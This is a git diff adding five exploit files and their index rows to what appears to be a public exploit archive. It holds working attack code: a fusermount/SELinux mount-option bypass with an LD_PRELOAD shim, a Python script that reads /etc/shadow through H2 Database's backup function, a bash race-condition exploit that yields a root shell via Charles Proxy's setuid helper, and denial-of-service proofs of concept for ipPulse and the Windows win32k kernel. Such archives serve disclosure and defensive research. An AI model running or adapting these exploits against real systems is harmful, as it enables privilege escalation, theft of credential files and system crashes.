diff --git a/exploits/linux/dos/45106.c b/exploits/linux/dos/45106.c new file mode 100644 index 000000000..470375f80 --- /dev/null +++ b/exploits/linux/dos/45106.c @@ -0,0 +1,100 @@ +/* +It is possible to bypass fusermount's restrictions on the use of the +"allow_other" mount option as follows if SELinux is active. + +Here's a minimal demo, tested on a Debian system with SELinux enabled in +permissive mode: + +=============================================== +uuser@debian:~$ mount|grep /mount +user@debian:~$ grep user_allow_other /etc/fuse.conf +#user_allow_other +user@debian:~$ _FUSE_COMMFD=10000 fusermount -o allow_other mount/ +fusermount: option allow_other only allowed if 'user_allow_other' is set in /etc/fuse.conf +user@debian:~$ _FUSE_COMMFD=10000 fusermount -o 'context=system_u:object_r:fusefs_t:s0-s0:c0-\,allow_other' mount +sending file descriptor: Bad file descriptor +user@debian:~$ mount|grep /mount +/dev/fuse on /home/user/mount type fuse (rw,nosuid,nodev,relatime,context=system_u:object_r:fusefs_t:s0-s0:c0,user_id=1000,group_id=1000,allow_other) +=============================================== + +Here's a demo that actually mounts a real FUSE filesystem with allow_other, +again on a Debian system configured to use SELinux: +=============================================== +user@debian:~$ cat fuse-shim.c +*/ + +#define _GNU_SOURCE +#include +#include +#include +int execv(const char *path, char *const argv_[]) { + char **argv = (void*)argv_; /* cast away const */ + for (char **argvp = argv; *argvp != NULL; argvp++) { + char *arg = *argvp; + for (char *p = arg; *p; p++) { + if (*p == '#') *p = '\\'; + } + } + int (*execv_real)(const char *, char *const argv[]) = dlsym(RTLD_NEXT, "execv"); + execv_real(path, argv_); +} + +/* +user@debian:~$ gcc -shared -o fuse-shim.so fuse-shim.c -ldl +user@debian:~$ echo hello world > hello.txt +user@debian:~$ zip hello.zip hello.txt + adding: hello.txt (stored 0%) +user@debian:~$ LD_PRELOAD=./fuse-shim.so fuse-zip -o 'context=system_u:object_r:fusefs_t:s0-s0:c0-#,allow_other' hello.zip mount +user@debian:~$ mount|grep /mount +fuse-zip on /home/user/mount type fuse.fuse-zip (rw,nosuid,nodev,relatime,context=system_u:object_r:fusefs_t:s0-s0:c0,user_id=1000,group_id=1000,allow_other) +user@debian:~$ sudo bash +root@debian:/home/user# ls -laZ mount +total 5 +drwxrwxr-x. 3 root root system_u:object_r:fusefs_t:s0-s0:c0 0 Jul 18 02:19 . +drwxr-xr-x. 30 user user system_u:object_r:unlabeled_t:s0 4096 Jul 18 02:19 .. +-rw-r--r--. 1 user user system_u:object_r:fusefs_t:s0-s0:c0 12 Jul 18 02:19 hello.txt +root@debian:/home/user# cat mount/hello.txt +hello world +=============================================== + + +I have tested that this also works on Fedora (which, unlike Debian, has SELinux +enabled by default.) + + +Unfortunately, I only noticed that this was possible after I publicly sent some +fusermount hardening patches (https://github.com/libfuse/libfuse/pull/268), +when the maintainer asked a question about one of the patches. + + +Breaking down the attack, the problems are: + +1. fusermount's do_mount() is written as if backslashes escape commas in mount + options; however, this is only true for the "fsname" and "subtype" + pseudo-options filtered out by do_mount(). Neither SELinux nor the FUSE + filesystem follow those semantics. This means that an attacker can smuggle + a forbidden option through fusermount's checks if the previous option ends + with a backslash. However, no option accepted by the FUSE filesystem can end + with a backslash, so this seemed unexploitable at first. + This is fixed by the following commit in my pull request: + https://github.com/libfuse/libfuse/pull/268/commits/455e73588357 +2. fusermount uses a blacklist, not a whitelist; this blacklist does not contain + the mount options understood by the SELinux and Smack LSMs. LSMs have the + opportunity to grab mount options and make them invisible to the actual + filesystem through the security_sb_copy_data() security hook. + For this attack, I'm using the "context" option. + This is fixed by the following commit in my pull request: + https://github.com/libfuse/libfuse/pull/268/commits/d23efabfcee4 +3. The SELinux LSM is slightly lax about parsing the level component of SELinux + context strings when the policy uses Multi-Level Security (MLS). + When using MLS, the format of a context string is + ":::"; the level component is parsed by + mls_context_to_sid(). The level component is supposed to specify a + sensitivity range (one or two parts delimited with '-'); each part of the + range may be followed by ':' and a category set specification. + If the sensitivity range consists of two parts and the second part of the + range is followed by a category set, the function incorrectly marks a + trailing '-' and any following data until ':' or '\0' as consumed, but does + not actually parse this data. This allows an attacker to smuggle a backslash + through. +*/ \ No newline at end of file diff --git a/exploits/linux/webapps/45105.py b/exploits/linux/webapps/45105.py new file mode 100755 index 000000000..474817444 --- /dev/null +++ b/exploits/linux/webapps/45105.py @@ -0,0 +1,68 @@ +# Exploit Title: H2 Database 1.4.197 - Information Disclosure +# Date: 2018-07-16 +# Exploit Author: owodelta +# Vendor Homepage: www.h2database.com +# Software Link: http://www.h2database.com/html/download.html +# Version: all versions +# Tested on: Linux +# CVE : CVE-2018-14335 + +# Description: Insecure handling of permissions in the backup function allows +# attackers to read sensitive files (outside of their permissions) via a +# symlink to a fake database file. + +# PS, thanks to HTB and our team FallenAngels + +#!/usr/bin/python + +import requests +import argparse +import os +import random + +def cleanup(wdir): + cmd = "rm {}symlink.trace.db".format(wdir) + os.system(cmd) + +def create_symlink(file, wdir): + cmd = "ln -s {0} {1}symlink.trace.db".format(file,wdir) + os.system(cmd) + + +def trigger_symlink(host, wdir): + outputName = str(random.randint(1000,10000))+".zip" + #get cookie + url = 'http://{}'.format(host) + r = requests.get(url) + path = r.text.split('href = ')[1].split(';')[0].replace("'","").replace('login.jsp','tools.do') + url = '{}/{}'.format(url,path) + payload = { + "tool":"Backup", + "args":"-file,"+wdir+outputName+",-dir,"+wdir} + #print url + requests.post(url,data=payload).text + print "File is zipped in: "+wdir+outputName + +if __name__ == "__main__": + parser = argparse.ArgumentParser() + required = parser.add_argument_group('required arguments') + required.add_argument("-H", + "--host", + metavar='127.0.0.1:8082', + help="Target host", + required=True) + required.add_argument("-D", + "--dir", + metavar="/tmp/", + default="/tmp/", + help="Writable directory") + required.add_argument("-F", + "--file", + metavar="/etc/shadow", + default="/etc/shadow", + help="Desired file to read",) + args = parser.parse_args() + +create_symlink(args.file,args.dir) +trigger_symlink(args.host,args.dir) +cleanup(args.dir) \ No newline at end of file diff --git a/exploits/macos/local/45107.txt b/exploits/macos/local/45107.txt new file mode 100644 index 000000000..a48e1318d --- /dev/null +++ b/exploits/macos/local/45107.txt @@ -0,0 +1,80 @@ +Charles Proxy is a great mac application for debugging web services and +inspecting SSL traffic for any application on your machine. + +In order to inspect the SSL traffic it needs to configure the system to use a +proxy so that it can capture the packets and use its custom root CA to decode +the SSL. + +Setting a system-wide proxy requires root permissions so this is handled by an +suid binary located within the Charles application folder: + +/Applications/Charles.app/Contents/Resources/Charles Proxy Settings + +Unfortunately this binary is vulnerable to a race condition which allows a local +user to spawn a root shell. It supports a parameter "--self-repair" which it +uses to re-set the root+suid permissions on itself, with a graphical dialog +shown to the user. However if this is called when the binary is already +root+suid then no password dialog is shown. + +It doesn't validate the path to itself and uses a simple API call to get the +path to the binary at the time it was invoked. This means that between executing +the binary and reaching the code path where root+suid is set there is enough +time to replace the path to the binary with an alternate payload which will then +receive the suid+root permissions instead of the Charles binary. + +This issue was fixed in Charles 4.2.1 released in November 2017. + +https://m4.rkw.io/charles_4.2.sh.txt +2f4a2dca6563d05a201108ec6e9454e2894b603b68b3b70b8f8b043b43ee9284 +------------------------------------------------------------------------------- +#!/bin/bash + +#################################################### +###### Charles 4.2 local root privesc exploit ###### +###### by m4rkw - https://m4.rkw.io/blog.html ###### +#################################################### + +cd +user="`whoami`" + +cat > charles_exploit.c < +int main() +{ + setuid(0); + seteuid(0); + execl("/bin/bash","bash","-c","rm -f \"/Users/$user/Charles Proxy Settings\"; /bin/bash",NULL); + return 0; +} +EOF + +gcc -o charles_exploit charles_exploit.c +if [ $? -ne 0 ] ; then + echo "failed to compile the exploit, you need xcode cli tools for this." + exit 1 +fi +rm -f charles_exploit.c + +ln -s /Applications/Charles.app/Contents/Resources/Charles\ Proxy\ Settings +./Charles\ Proxy\ Settings --self-repair 2>/dev/null & +rm -f ./Charles\ Proxy\ Settings +mv charles_exploit Charles\ Proxy\ Settings + +i=0 + +while : +do + r=`ls -la Charles\ Proxy\ Settings |grep root` + if [ "$r" != "" ] ; then + break + fi + sleep 0.1 + i=$((i+1)) + if [ $i -eq 10 ] ; then + rm -f Charles\ Proxy\ Settings + echo "Not vulnerable" + exit 1 + fi +done + +./Charles\ Proxy\ Settings \ No newline at end of file diff --git a/exploits/windows/dos/45102.py b/exploits/windows/dos/45102.py new file mode 100755 index 000000000..6ad5c9d30 --- /dev/null +++ b/exploits/windows/dos/45102.py @@ -0,0 +1,26 @@ +# Exploit Title: ipPulse 1.92 - 'IP Address/HostName-Comment' Denial of Service (PoC) +# Discovery by: Luis Martinez +# Discovery Date: 2018-07-27 +# Vendor Homepage: https://www.netscantools.com/ippulseinfo.html +# Software Link : http://download.netscantools.com/ipls192.zip +# Tested Version: 1.92 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows 10 Pro x64 es + +# Steps to Produce the Crash: +# 1.- Run python code : python ipPulse_1.92.py +# 2.- Open ipPulse_1.92.txt and copy content to clipboard +# 3.- Open ippulse.exe +# 4.- Target Editor +# 5.- Paste ClipBoard on "IP Address/HostName" +# 6.- Paste ClipBoard on "Comment" +# 7.- Add Above Fields to Target List >> +# 8.- OK +# 9.- Crashed + +#!/usr/bin/env python + +buffer = "\x41" * 3400 +f = open ("ipPulse_1.92.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/45104.c b/exploits/windows/dos/45104.c new file mode 100644 index 000000000..7c2f831ae --- /dev/null +++ b/exploits/windows/dos/45104.c @@ -0,0 +1,78 @@ +# Exploit Title: Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC) +# Author: vportal +# Date: 2018-07-27 +# Vendor homepage: http://www.microsoft.com +# Version: Windows 7 x86 +# Tested on: Windows 7 x86 +# CVE: N/A + +# It is possible to trigger a BSOD caused by a Null pointer deference when calling the system +# call NtUserConsoleControl with the following arguments: + +# NtUserControlConsole(1,0,8). +# NtUserControlConsole(4,0,8). +# NtUserControlConsole(6,0,12). +# NtUserControlConsole(2,0,12). +# NtUserControlConsole(3,0,20). +# NtUserControlConsole(5,0,8). + +# Different crashes are reproduced for each case. For the second case the crash is showed below: +# EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - La instrucci n en 0x%08lx hace referencia a la memoria +# en 0x%08lx. La memoria no se pudo %s. +# FAULTING_IP: +# win32k!xxxSetConsoleCaretInfo+c +# 93310641 8b0e mov ecx,dword ptr [esi] + +# TRAP_FRAME: 8c747b2c -- (.trap 0xffffffff8c747b2c) +# ErrCode = 00000000 +# eax=00000000 ebx=00000000 ecx=84fc9100 edx=00000000 esi=00000000 edi=00000003 +# eip=93310641 esp=8c747ba0 ebp=8c747bb0 iopl=0 nv up ei ng nz ac po nc +# cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010292 +# win32k!xxxSetConsoleCaretInfo+0xc: +# 93310641 8b0e mov ecx,dword ptr [esi] ds:0023:00000000=???????? +# Resetting default scope + +# CUSTOMER_CRASH_COUNT: 1 +# DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT +# BUGCHECK_STR: 0x8E +# PROCESS_NAME: Win32k-fuzzer_ + +# CURRENT_IRQL: 0 +# LAST_CONTROL_TRANSFER: from 9330fc27 to 93310641 + +# STACK_TEXT: +# 8c747bb0 9330fc27 00000000 00000003 00000014 win32k!xxxSetConsoleCaretInfo+0xc +# 8c747bcc 9330fa8d 00000003 00000000 00000014 win32k!xxxConsoleControl+0x147 +# 8c747c20 82848b8e 00000003 00000000 00000014 win32k!NtUserConsoleControl+0xc5 +# 8c747c20 012e6766 00000003 00000000 00000014 nt!KiSystemServicePostCall +# WARNING: Frame IP not in any known module. Following frames may be wrong. +# 0016f204 00000000 00000000 00000000 00000000 0x12e6766 + +# PoC code: + +#include + +extern "C" + +ULONG CDECL SystemCall32(DWORD ApiNumber, ...) +{ +__asm{mov eax, ApiNumber}; +__asm{lea edx, ApiNumber + 4}; +__asm{int 0x2e}; +} + + +int _tmain(int argc, _TCHAR* argv[]) +{ + +int st = 0; +int syscall_ID = 0x1160; //NtUserControlConsole ID Windows 7 + +LoadLibrary(L"user32.dll"); + +st = (int)SystemCall32(syscall_ID, 4, 0, 8); + +return 0; +} + +# The vulnerability has only been tested in Windows 7 x86. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 508b1e1de..08964fb21 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6011,6 +6011,7 @@ id,file,description,date,author,type,platform,port 44958,exploits/windows/dos/44958.py,"Core FTP LE 2.2 - Buffer Overflow (PoC)",2018-07-02,"Berk Cem Göksel",dos,windows,21 44962,exploits/linux/dos/44962.txt,"SIPp 3.6 - Local Buffer Overflow (PoC)",2018-07-02,"Fakhri Zulkifli",dos,linux, 44965,exploits/hardware/dos/44965.py,"Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)",2018-07-02,t4rkd3vilz,dos,hardware,80 +45106,exploits/linux/dos/45106.c,"fusermount - user_allow_other Restriction Bypass and SELinux Label Control",2018-07-30,"Google Security Research",dos,linux, 44972,exploits/linux/dos/44972.py,"openslp 2.0.0 - Double-Free",2018-07-03,"Magnus Klaaborg Stubman",dos,linux, 44994,exploits/linux/dos/44994.html,"Tor Browser < 0.3.2.10 - Use After Free (PoC)",2018-07-09,t4rkd3vilz,dos,linux, 45011,exploits/windows/dos/45011.js,"Microsoft Edge Chakra JIT - Out-of-Bounds Reads/Writes",2018-07-12,"Google Security Research",dos,windows, @@ -6030,6 +6031,8 @@ id,file,description,date,author,type,platform,port 45092,exploits/windows/dos/45092.py,"QNap QVR Client 5.1.1.30070 - 'Password' Denial of Service (PoC)",2018-07-27,"Luis Martínez",dos,windows, 45095,exploits/windows/dos/45095.py,"NetScanTools Basic Edition 2.5 - 'Hostname' Denial of Service (PoC)",2018-07-27,"Luis Martínez",dos,windows, 45098,exploits/multiple/dos/45098.txt,"Skia - Heap Overflow in SkScan::FillPath due to Precision Error",2018-07-27,"Google Security Research",dos,multiple, +45102,exploits/windows/dos/45102.py,"ipPulse 1.92 - 'IP Address/HostName-Comment' Denial of Service (PoC)",2018-07-30,"Luis Martínez",dos,windows, +45104,exploits/windows/dos/45104.c,"Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC)",2018-07-30,vportal,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -9835,6 +9838,7 @@ id,file,description,date,author,type,platform,port 45085,exploits/windows/local/45085.py,"10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows, 45086,exploits/windows/local/45086.py,"10-Strike LANState 8.8 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows, 45089,exploits/linux/local/45089.py,"Inteno’s IOPSYS - (Authenticated) Local Privilege Escalation",2018-07-21,neonsea,local,linux, +45107,exploits/macos/local/45107.txt,"Charles Proxy 4.2 - Local Privilege Escalation",2018-07-30,"Mark Wadham",local,macos, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -39714,3 +39718,4 @@ id,file,description,date,author,type,platform,port 45088,exploits/hardware/webapps/45088.txt,"Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)",2018-07-26,vulnc0d3,webapps,hardware,80 45094,exploits/linux/webapps/45094.txt,"Online Trade 1 - Information Disclosure",2018-07-27,Dhamotharan,webapps,linux, 45097,exploits/php/webapps/45097.txt,"SoftNAS Cloud < 4.0.3 - OS Command Injection",2018-07-27,"Core Security",webapps,php, +45105,exploits/linux/webapps/45105.py,"H2 Database 1.4.197 - Information Disclosure",2018-07-30,owodelta,webapps,linux,